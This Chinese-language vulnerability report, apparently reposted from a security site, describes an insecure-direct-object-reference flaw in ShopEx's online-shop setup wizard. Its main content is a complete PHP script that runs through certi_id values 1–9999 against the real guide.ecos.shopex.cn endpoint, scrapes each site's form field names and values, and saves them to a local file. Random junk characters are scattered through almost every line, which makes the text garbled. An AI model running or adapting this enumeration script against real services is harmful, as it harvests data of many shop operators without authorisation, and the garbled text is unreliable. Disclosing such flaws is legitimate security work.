|
简要描述:& y' e* k1 y7 @; u7 d# k
ShopEx某接口缺陷,可遍历所有网站5 J* u. n7 H9 \+ S! R
详细说明:
' X6 t! q9 C9 t7 B- x3 x问题出现在shopex 网店使用向导页面
, H# n6 `: D% ~" z2 q% E) o9 s
4 M8 z9 \4 B3 H/ w" k) }% y: f& f8 ^" {( M: n% Q8 J/ X- w3 V
" ~# x5 E; |5 S0 s7 J6 U, E" rhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0= _. h3 x. e: F, v
+ C& g( D" h* v9 d! w6 T
( b3 }# O+ k9 W2 ]' \/ M9 B7 G! Z2 d" M8 a
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
( a3 ]% b0 o3 |& y" x5 f6 M) C7 k& `# H+ t% Z
0 P) ^% H% r3 b4 s1 l5 J
' Y1 V" j- T) d
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
4 ` ?+ z0 [8 R7 z9 O2 H c m% E# L" k* ~# C3 z
: e3 a: w! e" r) Q9 u( R# \. s$ X
7 U4 z3 s6 c6 k& X<?php
9 |) B1 d3 W2 g$ @3 T1 b* P4 A' d: l$ @! L. J% \, a& H
for ($i=1; $i < 10000; $i++) { //遍历
* X2 ?% Q8 _" A& v- C. i. N/ y4 T
; k) d+ n7 `/ W/ K3 k ShowshopExD($i);. O, @/ G4 T1 R' u7 C
8 e9 l) K. F' z4 u, }$ N
}3 n- k' R) c$ H( ~' h% C# z
5 w. ^! v( I6 b function ShowshopExD($cid) { y) n- k9 @3 W/ j
; I: w# p% J$ f$ X4 V4 G7 @ $url='http://guide.ecos.shopex.cn/step2.php';. J# u- U! W. ~' t$ V- T* r8 B
* L$ i7 s% G4 g6 j" }5 V* L/ m, l
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ N8 W6 b0 \0 H5 k/ s( B
- \! K: D% ?. X+ C8 c+ J3 U. J $url = $url.'?refer='.$refer;
' ]/ v) H; r: A9 K L! @" M
) K" @% [0 I% p. I $ch = curl_init($url);3 V, D- b; H, T6 G. \
" F( n! L$ T8 z3 {0 B0 D curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
6 A$ Z6 x- L* _! O# C. f4 N% r8 a) n5 e
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;) P5 @2 n9 |0 \ b8 m
0 ~1 L% D! y, H+ n. z9 e
$result = curl_exec($ch);
2 b( g* Q/ x& |) z2 d0 d- ^9 L& q. s
$result = mb_convert_encoding($result, "gb2312", "UTF-8");3 ~3 r' _3 v, c$ ^
0 L5 ~ f) j1 N9 B0 ?% `+ M
if(strpos($result,$refer))/ f% q9 N5 P4 @2 w
$ E% p$ }' p n
{
5 P' h( Q" |1 |1 K) }# q7 W/ e. d; a8 i8 }2 U; Q6 h2 D9 K" x
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件( g& R1 W! F1 s: t
8 ?/ O- Q7 d/ I8 A4 z
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);0 ^/ w3 n' U; s$ C8 q5 `
: i4 L, ?8 Z0 w6 x* E1 k1 }# ]
foreach ($value[1] as $key) {3 v, F/ u1 J. A# O
9 r' D8 T6 T: ]% Z preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);/ d$ T8 O3 g. _
4 ]% m# z# q. p$ y echo $res[1][0].':'.$res[3][0]."\r\n";
6 y8 D4 v8 U6 u4 Y; p J9 @0 t9 c C( I& q: I& \/ q
$col =$res[1][0].':'.$res[3][0]."\r\n";
, [4 |* j& P6 m) z$ N$ o0 L# n I) I* ?2 d8 ?' g
fwrite($fp, $col, strlen($col)); ( x4 t6 p" R1 S7 j/ E
l; N- z2 t0 {7 N }
% j% g( [' B" K" }" P/ Y" {* }/ a
5 |. k8 `' a# y* g7 J7 A echo '--------------------------------'."\r\n";
$ Q) n& Q5 L' g2 i8 O6 e- z; @$ u8 C8 c; b
fclose($fp); 6 H1 K% ]/ o% C8 r X1 f6 T
& w, {$ a3 q! f }$ o. V: K1 l% \1 Y: j. `. {
! F+ Z; o+ T1 K5 v# s1 S flush();
% Z W: {5 b$ P2 R8 c. R3 o$ D
, Z" ~# a" }$ ^( | curl_close($ch);: a5 Z' ]" q7 P/ d" L8 a- c* L
% _8 u& b) v( l2 E3 e" k
}
, A) E6 N. S! E' t5 l. b G& I3 {7 h( I9 _: A
?>
4 \ [# [7 w6 `& d$ n# G+ Z漏洞证明:( L/ p0 L8 A" `: f
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
% P3 W( z8 k: a# @refer换成其他加密方式5 \( w0 X' B |3 w- C4 H
|
|